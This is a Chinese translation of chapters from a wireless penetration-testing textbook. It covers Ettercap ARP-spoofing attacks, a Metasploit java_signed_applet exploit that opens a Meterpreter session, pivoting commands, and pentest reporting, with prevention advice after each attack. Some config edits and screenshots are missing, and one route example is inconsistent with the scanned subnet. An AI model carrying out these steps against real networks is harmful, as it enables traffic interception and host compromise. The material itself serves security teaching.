admin 管理员组

文章数量: 887006

原文:annas-archive/md5/D59E41F7ACC45B0B41190D5148AF7292

译者:飞龙

协议:CC BY-NC-SA 4.0

第八章:数据捕获和利用

欢迎!在上一章中,我们使用了几个工具,如 Karmetasploit、Wireshark 和 WiFi Pineapple。

在本章中,我们将涵盖以下主题:

  • 捕获未加密的网络流量

  • 中间人攻击

  • Metasploit

  • 威胁的预防

在上一章中,我们讨论了如何嗅探流量,但是如何获取用户名、密码和其他敏感信息呢?

由于这是一本高级技术书籍,我们期望您对此有基本的了解;但是,为了您的利益,我们将演示如何使用这些工具。感到自信?没问题。继续并跳过演示。对于仍在阅读的人,让我们开始学习如何捕获加密流量。

捕获未加密的流量

我们知道未加密的无线流量可以被连接到同一无线网络的任何人以纯文本形式查看。您的数据可能会受到损害,例如您的电子邮件、即时消息、通过 FTP 传输的文件、telnet 会话、HTTP 会话等。这是如何工作的?当用户使用 HTTP 浏览网站时,他们传输的数据没有端到端的保护,因此可以被同一网络上的任何人拦截和记录。

Wireshark 是一款网络分析器,允许您查看实时网络数据包并保存结果。Wireshark 可以在 Windows、Mac、Linux 和 Unix 操作系统上运行。如果用户在网络上运行 Wireshark,他们可以看到人们访问的网站、正在传输的文件、即时消息等等。

有许多网络服务容易受到网络嗅探和公共网络的威胁。任何具有 Wireshark 技能和知识的人都可以轻松地破坏您的帐户。

为了保持安全,请始终检查以下内容:

  • 使用 WPA 或 WPA2 加密

  • 在公共网络上始终使用 HTTPS

  • 使用 SSH 或加密电子邮件进行文件传输

  • 在公共网络上使用 VPN

  • 使用密码管理器登录网站

中间人攻击

您可能听说过中间的猴子,但您听说过中间人吗?中间人MITM)攻击是用户成为网络拦截的受害者。网络上的恶意用户就像一个路由器一样,他们抓取所有的网络流量。这包括电子邮件、登录、聊天消息等等。

此演示仅供教育目的使用。黑客行为可以使您更加安全,这是一个很好的技能资产。在大多数国家,未经许可在未经授权的网络上进行任何形式的恶意活动都被视为犯罪。在下一次演示中,我们将使用我们自己的计算机和网络。

  1. 打开终端,输入leafpad /etc/ettercap/etter.conf

  2. 打开etter.conf,查找高亮显示的单词:

您需要将高亮显示的代码更改为这样:

  1. 点击Search然后点击Find。输入iptables然后点击Find按钮:

结果应该是这样的:

您需要取消注释两行,使其看起来像这样:

  1. 通过打开终端并输入ettercap –G来启动Ettercap-gtk

  2. 当 Ettercap 打开时,您需要点击Sniff然后选择Unified sniffing

  3. 选择连接到网络的接口:

注意

如果您正在使用 Wi-Fi,您将选择wlan0wlan1

  1. 点击主机,然后选择扫描主机,如下面的屏幕截图所示:

  2. 在命令框中,您应该看到已添加到主机列表的主机。 点击主机,然后选择主机列表

  3. 选择路由器的 IP 地址,然后单击添加到目标 1按钮。 将显示以下屏幕:

  4. 选择受害者的 IP 地址,然后单击添加到目标 2按钮:

  5. 点击Mitm,然后选择ARP 欺骗

  6. 收到提示时,请勾选嗅探远程连接旁边的框,然后单击确定

  7. 点击开始,然后选择开始嗅探

Ettercap 将开始对受害者和路由器进行 ARP 欺骗。 Ettercap 将显示来自受害者的任何信息或数据。

恭喜! 您已成功进行了一次完整的中间人攻击。

如果您愿意,您还可以使用诸如 sslstrip 和 urlsnarf 之类的工具,以从受害者那里获取一些额外信息。 sslstrip是一种 MITM 攻击,它迫使用户使用 HTTP 协议进行通信,而不是 HTTPS,攻击者可以查看所有 SSL 流量的明文。 HTTP 严格传输安全性HSTS)是一种安全保护机制,可保护您免受此类威胁。 它防止 HTTPS 在发生 cookie 和浏览器劫持时被降级。 urlsnarf以 CLF 格式显示所有请求的 HTTP 流量,并可用于分析用户访问的网站和网站流量。 攻击者也可以使用它来窥探用户在互联网上搜索和访问的内容。

要停止攻击,请单击开始,然后选择停止嗅探,如下所示:

停止攻击后,Ettercap 将发送一个 ARP 数据包,网络将在几分钟内恢复正常。 您可以使用 ARP 检测软件(如 XArp 或 Snort)来保护自己免受此类攻击。 此外,分配静态 ARP 条目可以帮助防止攻击。 它将告诉攻击者路由器的 MAC 地址是永久的,无法更改。 因此,它将忽略攻击者发送的所有 ARP 数据包。

Metasploit

啊是的,Metasploit 是最臭名昭著的开源工具,供渗透测试人员和 IDS 开发人员使用! Metasploit Framework是一个充满安全漏洞和脚本的数据库。 它是开发和执行针对目标系统的利用代码的最受欢迎的开源工具之一。 Metasploit UI 显示在以下屏幕截图中:

在下一个演示中,我们将利用 Windows 8.1 的 Java 漏洞。 此漏洞将允许攻击者获取系统信息或哈希转储,从网络摄像头中获取图片,授予管理权限,创建和运行可执行文件,创建后门等。 让我们开始吧!

  1. 打开终端并键入msfconsole

提示

您还可以运行server postgresql startservice metasploit start

  1. 现在键入search java_signed_applet

  2. 然后键入use exploit/multi/browser/java_signed_applet

  3. 现在键入set SRVHOST <IPADDRESS>

提示

用您的 Kali Linux IP 地址替换<IPADDRESS>

  1. 键入exploit

  2. 在受害者的系统上,转到 Metasploit 提供的 URL 链接。 您应该收到以下内容:

JVM 应该在受害者的系统上显示一个提示,询问他们是否信任已签名的小程序。如果用户正在运行较旧版本的 Java,它将显示UNKNOWN。一旦用户点击Run,Java 小程序将执行,从而利用 Java 在 Metasploit 中创建一个 Meterpreter 会话:

  1. 在 Meterpreter 中,键入sysinfo以确认您的成功。

恭喜!您已成功利用了 Windows 8.1 操作系统。

为了保护自己免受此类攻击,请考虑以下事项:

  • 如果不打算使用 Java,则禁用它

  • 提高 Java 的安全级别

  • 只允许来自 Java 的可信任来源

  • 只访问可信任的网站和远程服务器

  • 启用 Windows Defender 或其他安全软件

预防措施

以下是本章讨论的所有预防措施的总结:

  • 使用 SSH 或加密电子邮件进行文件传输

  • 在公共网络上使用 VPN

  • 使用密码管理器登录网站

  • 使用 XArp 或 Snort 等 ARP 检测软件

  • 分配静态 ARP 条目

  • 如果不打算使用 Java,则禁用它

  • 提高 Java 的安全级别

  • 只允许来自 Java 的可信任来源

  • 只访问可信任的网站和远程服务器

  • 启用 Windows Defender 或其他安全软件

  • 下载并安装软件更新

  • 下载并安装操作系统更新

再次强调,这一切取决于用户的计算机行为。如果用户连接到公共网络,他们可能会成为中间人攻击的受害者。如果用户盗版软件或电影,他们可能会成为漏洞攻击的受害者。

总结

希望您和我一样喜欢本章。实际演示应该已经证明是一个很好的思维启发,并拓宽了您对安全的认识,以进一步保护自己和他人免受攻击。

在本章中,我们涵盖了以下内容:

  • 如何捕获使用 HTTP、FTP 和 Telnet 等协议的未加密流量

  • 如何使用加密保护自己

  • 什么是中间人攻击

  • 中间人攻击的演示

  • 如何保护自己免受中间人攻击

  • Metasploit 是什么

  • Metasploit 的演示

  • 如何保护自己免受 Metasploit 攻击

在下一章中,您将学习如何通过本地网络来访问其他系统和设备。我们还将记录我们的工作,并在最后进行清理。见你在第九章,后期利用

第九章:后期利用

欢迎!在上一章中,我们入侵了网络上的一个目标。接下来会发生什么,你可能会问?攻击者很可能会深入攻击内部工作站和服务器。在本章中,我们将涵盖以下主题:

  • 如何创建一个数据透视

  • 记录我们的工作

  • 清理我们的工作

  • 保护自己免受数据透视攻击

后期利用

创建一个数据透视

我们已经破解了无线加密,获得了对网络的访问权限,并入侵了一个系统。攻击者接下来会采取的下一步是避开入侵防范系统IPS)或入侦测系统IDS)。数据透视将通过将流量路由到受损系统,然后使用受损系统的流量对内部网络上的其他工作站和服务器发起额外的攻击来实现这一点。这将欺骗 IPS 和防火墙日志,使其显示内部 IP 地址而不是攻击者的外部 IP 地址。

现在,你可能会问自己,为什么我要购买 IDS 或 IPS,如果它不能保护我的网络?嗯,在网络上激活 IDS 或 IPS 不仅很重要,而且监视和每天审查它也很重要。如果没有人适当地监视或审查 IDS 或 IPS,那么你可能已经有人在你的网络上潜伏而你却不知道。

让我们花一些时间讨论为什么拥有 IDS 或 IPS 很重要:

  • 物理安全:

  • 你怎么知道有人不已经在你的网络上了?

他们可能正在访问敏感数据

  • 在处理防火墙时,你是否忘记禁用 SSH?

攻击者只需一个开放的漏洞就能获取访问权限,然后可能获得对其他内容的访问权限

  • 可靠性和稳定性:

  • 风险管理

  • 对业务运营的影响较小

  • 业务连续性

  • 减少业务停机时间

  • 灵活性:

  • 访问其他人无法访问的安全控制功能

  • 提供额外的安全和控制层

  • 安心:

  • 当其他安全控制意外失败时,IDS 可以提供额外的安全服务

  • 知道谁和什么进入你的网络来访问数据非常重要,特别是如果其中包含客户数据或其他敏感信息

总之,安全对于企业来说变得更加重要。企业因为没有采取额外的安全措施来保护客户的个人数据而损失了金钱。在某些情况下,这些信息可能会被公开。一旦公开,企业可能会失去现有客户和新客户。

在 IDS 和 IPS 上说了足够的话,现在是时候开始我们本章的数据透视演示了。在开始之前,我们必须已经入侵了一个系统并获得了对 Meterpreter 会话的访问权限。如果你还没有做到这一点,请参考第八章,数据捕获和利用

让我们开始吧!

  1. 访问 Meterpreter 并输入:
ipconfig

这将显示内部 IP 地址:

  1. 运行网络扫描并输入:
run arp_scanner –r 192.168.10.0/24

这将显示内部网络上的所有主机:

  1. 然后输入background。这将使 Meterpreter 会话保持运行,同时我们在 Metasploit 控制台中运行其他命令。

  2. 然后,我们添加从默认网关到受损系统的路由并输入:

route add 192.168.1.110 255.255.255.0 1

这将通过受损系统将默认网关的所有流量路由。这将使我们能够访问内部网络中的其他主机,从而也威胁到这些系统。

创建一个数据透视

恭喜!您已成功创建了一个枢纽。内部网络是完全可访问的,您可以在这里对其他主机运行攻击,而不必担心 IDS、IPS 或防火墙警报。攻击看起来像是来自内部网络。

记录您的渗透测试

渗透测试中可能最重要的部分之一是记录您的工作。开始记录您的渗透测试的最佳方法是创建一个大纲。

以下是专业大纲的示例:

介绍

  • 对客户的 10.0.0.0/24 网络执行渗透测试。此渗透测试的目标是确定 10.0.0.0/24 网络的无线安全性。评估是在几个目标系统上执行的。给出的结果不是为所有主机,而是仅适用于 IP 范围内的那些系统。

  • 客户 John Doe 在整个渗透测试期间承认了所有确定的漏洞。此测试不运行任何拒绝服务DoS)攻击;但是,可以确定主机是否容易受到 DoS 攻击,而无需执行实际攻击。

系统

  • 显示网络上将被识别并扫描漏洞的每个目标系统

方法和技术

  • 发现:

  • 检查 DNS 记录、whois 服务器,使用 ping 和 traceroute 等网络工具,以及主干防火墙和路由器

  • 使用 TCP、UDP 和 ICMP 回显请求绘制网络地图

steve p2008,知识共享 2.0 (www.flickr/photos/stevepj2009/6857101082/)

  • 枚举:

  • 识别开放的 TCP 和 UDP 端口

  • 检测操作系统和软件版本

  • 确定主机类型(防火墙、DNS 服务器和邮件服务器)

  • 确定主机是否容易受到远程攻击的漏洞

  • 系统配置和横幅抓取

  • 利用:

  • 尝试利用任何漏洞或弱点

  • 执行缓冲区溢出攻击

  • 获得系统级访问权限

  • 暴力攻击

风险

  • 每个漏洞都按风险级别(低、中和高)进行组织,以及有关安全问题和可用于这些漏洞的威胁的详细信息。

  • 任何未经授权的用户可以访问与客户数据、业务数据、员工或网络基础设施相关的敏感信息的信息。

  • 安全问题,如弱密码或可能导致系统受损的社会工程攻击。

  • 不需要任何钥匙或密码的非安全门户入口。这样,系统可以随时被入侵以收集额外信息。

  • 开放的无线网络不在一个单独的子网上,攻击者可以远程访问网络上的服务器或其他主机。

结论

  • 详细说明渗透测试期间整体风险关注的百分比

  • 提供有关漏洞、弱点、问题、数据泄漏和未识别来源的详细信息

清理不必要的工作

现在是时候开始清理渗透测试结果了。我们希望在完成渗透测试时,我们的报告尽可能干净、简单和专业。列出渗透测试期间执行的每个细节和所有操作。任何受损的主机必须得到安全清理,以确保不会影响正常的业务运营。该过程应由技术人员验证,以确保一切都已成功地完成。

任何剩下的糟糕的安全实践和配置错误的系统都不应该被放置不管,而应该进行重新配置或安全设置更改。加密并备份在渗透测试期间使用的任何重要文件或信息。删除或移除可能为测试而创建的未使用的用户帐户。渗透测试人员有责任通知组织有关对网络所做的任何系统更改。

预防

在本章中,我们看到了如何攻击一个系统,获取对同一子网上另一个系统的访问权限,然后从那里攻击不同子网上的计算机。虽然这种情况没有涉及任何公司防火墙,但公司防火墙有可能阻止对这些系统或网络的访问。如果你认为你的网络可能正在被摇摆或受到威胁,立即断开网络连接。然后,开始追踪根本原因并将其与网络的其余部分隔离开来。我们在这里真正的问题是缺乏安全意识。受到威胁的用户可能点击了恶意链接,或者下载了他们认为是合法的电子邮件附件或软件。

这就是为什么教育员工有关安全问题非常重要。社会工程攻击变得越来越复杂,以提供更好的结果。保护自己的最佳方法是让自己和其他人了解威胁。

摘要

我们从介绍摇摆及其工作原理开始了本章,然后通过 Kali Linux 进行了演示。通过记录我们的渗透测试,我们能够组织我们的工作并在大纲中列出每一个细节。记录是一个重要的过程,为我们在下一章中规划和撰写报告做准备。完成记录工作后,我们开始清理所有不必要的工作。

任何新的文件夹、文件、用户帐户或更改的系统设置都应该被删除或移除。最后,我们提供了一份关于如何保护自己免受摇摆攻击的摘要。在下一章中,我们将提供一份渗透测试报告,其中包含了我们之前的无线渗透测试中的漏洞的详细信息。

第十章:报告

啊!我们终于在第十章见面了。恭喜!你成功读完了这本书。但在我们庆祝之前,我们还有最重要的无线渗透测试的一部分要讨论。

在这最后一章,我们将:

  • 规划无线渗透测试报告

  • 撰写无线渗透测试报告

  • 提供包括漏洞信息在内的详细报告

规划报告

在我们开始撰写报告之前,我们必须花大部分时间规划报告。这说起来容易做起来难。报告必须以专业的方式完成,不能草率。如果报告没有得到妥善规划,你就有可能浪费宝贵的时间,制作出不符合目标的报告。

以下是规划报告的有效示例:

  1. 确定问题的性质和渗透测试的目的:
  • 正在测试什么?

  • 什么没有被测试?

  • 你将使用什么方法进行渗透测试?

  1. 确定你的客户联系人:
  • 这是公司的总裁吗?

  • 这是一位高管吗?

  • 这是一个 IT 经理吗?

  1. 规划无线渗透测试:
  • 我们在进行渗透测试的是谁?

  • 是否有数据丢失预防DLP)或安全系统受到损害?

  • 你通过终端执行了任何命令吗?

  • 你使用了 Kali Linux 操作系统吗?

  • 你使用了什么工具?

  1. 收集信息:
  • 你发现了什么漏洞?

  • 你与可用的 CVE 进行了比较吗?

  • 你找到了任何弱密码登录吗?

  • 销售台下有隐藏的无线路由器吗?

  1. 组织信息:
  • 你列出了所有的信息来源吗?

  • 你忘记添加了什么吗?

  1. 评估信息:
  • 你收集了足够的信息吗?

  • 你仔细检查了你的工作吗?

  • 你强调了最关键的信息吗?

  1. 准备大纲:
  • 你的一切都准备好了吗?

  • 你为漏洞提供了解决方案吗?

总之,规划报告时,要花时间仔细计划所有细节。当我说详细,我指的是很多细节。你绝对不想漏掉你所做的任何工作,尤其是对于商业客户。

客户会想要从头到尾知道你做了什么,即使只是你访问每个小隔间和办公室,确保没有人在设置蜜罐。规划过程不容忽视。这有助于知道你是否漏掉或忘记在报告中添加某些内容。你不想做的是交上未完成的报告。

撰写报告

大纲准备好了吗?太好了!让我们开始撰写我们的无线渗透测试报告。我将提供一个你可以用作参考的示例。

介绍

这份渗透测试报告代表 Packt Publishing 对无线基础设施进行渗透测试的结果。客户完全知晓正在进行的渗透测试。技术细节将可供 IT 和/或信息安全专业人员阅读。这份报告将从收集信息、起草报告,到最终定稿,采用传统方法提供渗透测试报告。

flazingo_photos,知识共享 2.0(www.flickr/photos/124247024@N07/13903385550/

为了充分进行这次无线渗透测试,我们将使用 Kali Linux 操作系统。

受众

无线渗透测试可能针对大量的人群。报告将为软件和硬件的不同领域提供有结构的支持层。这份报告将针对以下用户:

  • 信息安全经理

  • 首席信息安全官

  • 信息技术经理

  • 其他技术人员

由于渗透测试将涉及诸如 IP 地址和服务器信息,一些应用程序信息,漏洞,威胁,利用等敏感信息,因此应被视为绝密,并且报告必须相应处理。

收集信息

渗透测试将需要利用多个工具,计算机等。渗透测试人员需要确保他们收集所有使用的系统和工具的信息。渗透测试人员将记录笔记,捕获屏幕截图图像,系统,软件和网络日志。

目标

为组织设定一个目标,并在了解与目标系统,应用程序或网络的渗透测试相关的安全风险后获得什么。需要提及渗透测试目标以及如何实现它。

假设

在渗透测试期间的任何假设都将帮助观众了解为什么渗透测试针对该目标进行。因此,假设可以帮助扩大组织的安全性:

时间记录

时间记录将为您提供渗透测试的开始和结束日期和时间。这将为观众提供关于渗透测试执行的实时信息。时间持续是非常重要的。时间记录将为客户提供一个过程执行和信息收集所需的时间感觉。

Cea, Creative Commons 2.0 (www.flickr/photos/centralasian/3276306508/)

信息概述

这将提供一个基于优先级发现的安全风险数量的概览。任何关键的安全风险都应该被突出,以便观众充分了解。建议也应列出,以便观众可以决定新的解决方案。

steve p2008, Creative Commons 2.0 (www.flickr/photos/stevepj2009/6857101082/)

详细信息

提供的所有信息应该最好地描述威胁级别,漏洞评级以及它对业务的影响。威胁级别可以通过威胁的结果来确定。威胁是否给予攻击者管理或根权限?它是否为系统创建后门?

Nessus 漏洞扫描仪还将为您提供颜色指示的威胁级别。红色表示最高的威胁级别,需要立即注意。添加任何表格,图表,饼图或图表可以为观众提供更好地理解结果的视觉效果。

漏洞

必须清楚详细地描述检测到的任何漏洞,以反映漏洞是什么,来源,影响和风险。所有漏洞都应提供解决方案。

Joe Buckingham, Creative Commons 2.0 (www.flickr/photos/oufoufsworld/4307457572/)

影响,可能性和风险

漏洞检测对企业提供了什么影响?漏洞是否足够危险,会泄露敏感公司信息或潜在地导致生产网络的停机时间?影响完全取决于威胁级别和威胁的恶意程度。企业被利用的可能性有多大?公司是否有任何竞争对手或已知目标可能攻击网络?访问的便捷性、访问级别、发现漏洞和利用漏洞的难度以及企业的价值资产是多少?是否存在可能导致 HIPAA 违规的客户信息或数据?

建议

基于风险评级和漏洞,渗透测试人员应提供专业建议和替代方案。例如,如果企业在通过互联网验证客户数据库用户帐户的弱身份验证协议,那么渗透测试人员应提供额外信息以进一步加强这个弱点。

Oldmaison,知识共享 2.0 (www.flickr/photos/httpoldmaisonblogspotcom/221227905/)

参考文献

参考文献对于您的报告至关重要。在提交参考文献时,您必须提供所有作者提供的工作的详细信息,这些工作是由您的工作和渗透测试生成的,包括以下内容:

  • 作者的名字和姓氏

  • 出版日期

  • 书名或文章标题

  • 出版商

  • 公开性

参考文献应按照作者姓名的字母顺序列出,并且必须准确和全面。

来源

如果您在渗透测试期间使用了任何网站进行研究,请列出所有这些网站。客户会想知道您是否花了外部时间研究漏洞以及如何解决它们。

完成报告

这一部分相当不言自明,但需要涵盖。在完成报告时,三次检查您的工作。在某些情况下,您可能没有人可用来审查您的报告,因此您需要为此过程做好准备。报告必须没有错误,渗透测试中的任何内容都不能被遗漏在报告之外。如果有什么不对劲,可以参考您当时的笔记和截图。

摘要

总结本章,我们涵盖了撰写报告的规划过程以及从头到尾撰写报告的过程。有时撰写报告可能会很艰难,但一旦掌握了窍门,您将能够像专业人士一样撰写报告。

作为作者,我的工作是为您作为读者提供最佳的阅读体验。这是我写的第一本技术书。现在轮到你了!你会如何评价这本书?你学到的比你预期的更多吗?它是否太难理解?它是否没有提供足够的实际演示?你是否觉得我忘了提到某些事情?欢迎在 Packt Publishing 的网站上联系我 www.packtpub。在另一边见!

本文标签: 高度 环境 测试